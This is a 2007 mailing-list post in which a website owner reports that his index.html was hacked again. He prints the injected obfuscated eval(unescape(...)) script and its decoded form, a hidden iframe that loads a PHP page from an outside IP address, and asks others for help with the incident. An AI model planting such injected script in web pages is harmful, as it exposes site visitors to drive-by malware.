[ale] I've been hacked!

Jim Lynch ale_nospam at fayettedigital.com
Wed Nov 21 06:57:14 EST 2007 

Last summer I received notification from Google that a web page on one 
of my web hosting accounts was infected with some sort of malware bug. 

This account only has ftp access so I changed the password for the one 
and only ftp account and removed the offending code from my index.html 
file.  I also added a cron job to another site to compare a good 
index.html with the one on the site that had been hacked in case they 
came back.

They did.

Today I received a message that said the compare failed and found the 
following at the top of the body in my index.html file:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); 
</script>

That script, unescaped looks like:

window.status='Done';document.write('<iframe name=7b73 
src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\' 
width=351 height=133 style=\'display: none\'></iframe>'

Has anyone seen anything like this before?  I wonder what  sort of evil 
function it might perform?

I also wonder how they got access the second time?  I went through the 
cgi scripts on that system to be sure they were mine. There aren't any 
php files on the system.

I attempted to look up the ip address but nslookup said it didn't exist, 
however it pings and the index.html file from it is the default apache2 
index file.  I suspect that system has been hacked as well.

Note the incident from last Summer was a different one.

Thanks,
Jim.

More information about the Ale mailing list